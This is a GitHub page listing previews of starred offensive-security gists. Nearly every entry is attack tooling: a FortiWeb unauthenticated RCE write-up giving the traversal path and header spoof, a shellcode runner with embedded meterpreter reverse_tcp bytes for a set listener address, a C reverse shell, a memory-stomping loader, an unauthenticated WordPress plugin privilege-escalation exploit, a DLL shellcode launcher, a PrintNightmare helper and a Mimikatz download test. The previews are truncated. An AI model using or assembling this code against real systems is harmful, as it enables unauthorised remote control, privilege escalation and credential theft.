Skip to content

Instantly share code, notes, and snippets.

View 0x25bit's full-sized avatar
:shipit:
Wait, did I stream that out loud?

Aekr1_ //akrasia 0x25bit

:shipit:
Wait, did I stream that out loud?
447 followers · 857 following
View GitHub Profile
@N3mes1s
N3mes1s / CVE-2025-64446.md
Created November 14, 2025 20:43
FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446

Security Report - FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass CVE-2025-64446

Summary

Fortinet assigned FG-IR-25-910 / CVE-2025-64446 to this issue on 14 Nov 2025, rating it Critical (CVSS 9.1) and confirming exploitation in the wild. The official advisory describes it as a “path confusion” (relative path traversal) in the FortiWeb GUI that lets an unauthenticated attacker execute administrative commands via crafted HTTP(S) requests. The mechanics match our findings: a traversal under /api/v2.0/… reaches /migadmin/cgi-bin/fwbcgi, and cgi_auth() blindly trusts the attacker-supplied HTTP_CGIINFO header to impersonate any administrator.

Root Cause

  1. Path traversal in Apache routinghttpd.conf registers <Location /api/v2.0/> SetHandler fwbcgi-handler. Apache matches the prefix before decoding %3f or collapsing /../, so /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi is forwarded straight to fwbcgi.
  2. **cgi_auth() trusts client-supplie
@dr4k0nia
dr4k0nia / HInvokeHashGen.cs
Created May 22, 2023 18:43
Tool to generate Hashes for HInvoke
using System;
using System.Collections;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using System.Reflection;
using System.Text;
GetMethodHash("System.Reflection.Assembly", "Load");
@joe-desimone
joe-desimone / RtlRunOnceExecuteOnceShellcodeExec.c
Created April 6, 2023 14:02 — forked from paranoidninja/RtlRunOnceExecuteOnceShellcodeExec.c
Shellcode execution via RtlRunOnceExecuteOnce NtAPI
#include <windows.h>
#include <stdio.h>
extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context);
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);
// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
unsigned char shellcode_bin[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
@loneicewolf
loneicewolf / compact_windows_reverse_shell.c
Last active December 1, 2025 10:06
A compact windows reverse shell written in the C Programming Language.
/*
* code inspired and modified from defcon25,MSDocs,StackOverflow
* i686-w64-mingw32-gcc -o win_rsh win_rsh.c -lws2_32
*/
#include <ws2tcpip.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32")
int main(int argc, char *argv[]){
WSADATA wsaData;
@Cracked5pider
Cracked5pider / LOADER_SNIPPET_STOMP.c
Created April 24, 2022 23:59
Lol
MapImg = MemAllocateStomped( &fTable, ImgLen );
if ( !MapImg ) {
sParam.ImgMod = TRUE;
MapImg = MemAllocateVirtual( &fTable, ImgLen );
};
InlineZeroMemory( MapImg, ImgLen );
SecHdr = IMAGE_FIRST_SECTION( NtsHdr );
for ( INT i = 0 ; i < NtsHdr->FileHeader.NumberOfSections ; ++i ) {
@numanturle
numanturle / Exploit.js
Created January 30, 2022 10:51
MasterStudy LMS – WordPress LMS Plugin 2.7.5 - Privilege Escalation (Unauthenticated)
function randomInt(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
jQuery(document).ready(function($){
username = "poctesting"+randomInt(1,1337);
password_poc = "S3cr3t"+randomInt(1,1337);
nonce = stm_lms_nonces.stm_lms_register
post_data = {
@mgeeky
mgeeky / How to use a function pointer in VBA.md
Created October 22, 2021 09:16 — forked from sancarn/How to use a function pointer in VBA.md
How to use a function pointer in VBA by Akihito Yamashiro

VB6 and VBA come with no support for function pointers.

Also, when you wish to execute a function in a dll using the Declare function, you can only call functions created by the Steadcall calling conversation.

These constraints can be avoided by using the DispCallFunc API. The DispCallFunc is widely used in VB6 when erasing the history of IE. Although the DispCallFunc is known as API for calling the IUnknown interface, in fact, you can also perform other functions other than COM by passing the NULL to the first argument.

As explained in the http://msdn.microsoft.com/en-us/library/ms221473(v=vs.85).aspx , the DispCallFunc argument is as follows.

@mgeeky
mgeeky / wdfilter-tests.ps1
Last active November 19, 2021 23:12
WdFilter.ps1 tests - script accompanying my tweet: https://twitter.com/mariuszbit/status/1450479981855969281
#
# Script that somewhat shows that processes specifically named may download
# Mimikatz unobstructed.
#
# Tweet related:
# https://twitter.com/mariuszbit/status/1450479981855969281
#
$code = @'
class Program
@aniqfakhrul
aniqfakhrul / dlllauncher.cs
Created July 7, 2021 04:21
DLL Shellcode Launcher with MSBuild export
//execute with
//msiexec.exe /z C:\Users\ch4rm\Desktop\ObfuscatorXOR\Dlllauncher\bin\x64\Release\Dlllauncher.dll
using System;
using RGiesecke.DllExport;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Text;
using System.Security.Cryptography;
using System.IO;
@hlldz
hlldz / cve_2021_1675_lpe_dll_finder.cpp
Last active January 26, 2022 12:39
DLL Path Finder for CVE-2021-1675 (LPE)
// It is returns DLL path, you can use that value in exploit.
// Example return value: C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_xxxxxxxxxxxxxxxx\Amd64\UNIDRV.DLL
wchar_t* findDLLPath() {
wchar_t targetDLLPath[MAX_PATH] = { 0 };
DWORD dwNeeded;
LPBYTE lpDriverInfo;
DWORD dwReturned;